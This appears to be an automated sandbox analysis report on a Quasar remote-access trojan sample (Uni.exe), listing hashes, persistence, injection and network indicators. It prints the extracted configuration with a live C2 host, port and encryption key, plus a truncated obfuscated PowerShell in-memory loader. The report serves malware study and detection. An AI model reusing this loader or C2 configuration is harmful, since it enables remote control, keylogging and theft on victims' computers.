Analysis
-
max time kernel
1800s -
max time network
1781s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
08-05-2024 17:28
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win7-20240419-en
Behavioral task
behavioral4
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/1192-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3248 created 4360 3248 WerFault.exe dllhost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exedescription pid process target process PID 3316 created 600 3316 powershell.EXE winlogon.exe PID 1984 created 600 1984 powershell.EXE winlogon.exe PID 4972 created 4360 4972 svchost.exe dllhost.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
$sxr-powershell.exeinstall.exeinstall.exepid process 3572 $sxr-powershell.exe 4688 install.exe 3240 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com 24 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3316 set thread context of 2332 3316 powershell.EXE dllhost.exe PID 1984 set thread context of 4360 1984 powershell.EXE dllhost.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 756 schtasks.exe 4712 SCHTASKS.exe 2744 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715189403" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE -
Modifies registry class 10 IoCs
Processes:
RuntimeBroker.exeExplorer.EXERuntimeBroker.exesihost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b0ee4a08-9beb-4a5c RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exe$sxr-powershell.exeWerFault.exesvchost.exepid process 3316 powershell.EXE 3316 powershell.EXE 1984 powershell.EXE 1984 powershell.EXE 3316 powershell.EXE 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 1984 powershell.EXE 1984 powershell.EXE 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 3572 $sxr-powershell.exe 2332 dllhost.exe 2332 dllhost.exe 1368 WerFault.exe 1368 WerFault.exe 2332 dllhost.exe 2332 dllhost.exe 4972 svchost.exe 4972 svchost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 3572 $sxr-powershell.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe 2332 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exepowershell.EXE$sxr-powershell.exepowershell.EXEdllhost.exedwm.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1192 Uni.exe Token: SeDebugPrivilege 3316 powershell.EXE Token: SeDebugPrivilege 3572 $sxr-powershell.exe Token: SeDebugPrivilege 1984 powershell.EXE Token: SeDebugPrivilege 3316 powershell.EXE Token: SeDebugPrivilege 2332 dllhost.exe Token: SeDebugPrivilege 1984 powershell.EXE Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 336 dwm.exe Token: SeCreatePagefilePrivilege 336 dwm.exe Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE Token: SeCreatePagefilePrivilege 3556 Explorer.EXE Token: SeShutdownPrivilege 3556 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 3572 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3556 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 1192 wrote to memory of 756 1192 Uni.exe schtasks.exe PID 1192 wrote to memory of 756 1192 Uni.exe schtasks.exe PID 1192 wrote to memory of 756 1192 Uni.exe schtasks.exe PID 1192 wrote to memory of 3572 1192 Uni.exe $sxr-powershell.exe PID 1192 wrote to memory of 3572 1192 Uni.exe $sxr-powershell.exe PID 1192 wrote to memory of 3572 1192 Uni.exe $sxr-powershell.exe PID 1192 wrote to memory of 4688 1192 Uni.exe install.exe PID 1192 wrote to memory of 4688 1192 Uni.exe install.exe PID 1192 wrote to memory of 4688 1192 Uni.exe install.exe PID 1192 wrote to memory of 4712 1192 Uni.exe SCHTASKS.exe PID 1192 wrote to memory of 4712 1192 Uni.exe SCHTASKS.exe PID 1192 wrote to memory of 4712 1192 Uni.exe SCHTASKS.exe PID 3572 wrote to memory of 2744 3572 $sxr-powershell.exe schtasks.exe PID 3572 wrote to memory of 2744 3572 $sxr-powershell.exe schtasks.exe PID 3572 wrote to memory of 2744 3572 $sxr-powershell.exe schtasks.exe PID 3572 wrote to memory of 3240 3572 $sxr-powershell.exe install.exe PID 3572 wrote to memory of 3240 3572 $sxr-powershell.exe install.exe PID 3572 wrote to memory of 3240 3572 $sxr-powershell.exe install.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 3316 wrote to memory of 2332 3316 powershell.EXE dllhost.exe PID 2332 wrote to memory of 600 2332 dllhost.exe winlogon.exe PID 2332 wrote to memory of 680 2332 dllhost.exe lsass.exe PID 2332 wrote to memory of 956 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 336 2332 dllhost.exe dwm.exe PID 2332 wrote to memory of 760 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1056 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1124 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1132 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1180 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1220 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1264 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1316 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1360 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1412 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1464 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1564 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1580 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1636 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1728 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1772 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1780 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1864 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1972 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2008 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2024 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1708 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 1952 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2128 2332 dllhost.exe spoolsv.exe PID 2332 wrote to memory of 2216 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2304 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2452 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2460 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2636 2332 dllhost.exe sihost.exe PID 2332 wrote to memory of 2660 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2760 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2812 2332 dllhost.exe svchost.exe PID 2332 wrote to memory of 2832 2332 dllhost.exe sysmon.exe PID 2332 wrote to memory of 2844 2332 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0a80d9a3-5396-440c-a465-1ad0e938c235}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{805349d0-2127-44b7-aafd-fa8bf0feb782}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4360 -s 2883⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zMLfToattpdp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JpuVjlHZSbEarD,[Parameter(Position=1)][Type]$zANAsQYZpm)$tBGbcLAHQGC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'em'+'o'+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+'i'+[Char](67)+'l'+'a'+'ss'+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$tBGbcLAHQGC.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+'e'+','+''+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g,'+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$JpuVjlHZSbEarD).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+','+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$tBGbcLAHQGC.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$zANAsQYZpm,$JpuVjlHZSbEarD).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+'e'+''+'d'+'');Write-Output $tBGbcLAHQGC.CreateType();}$fwtGBqWABCmDx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 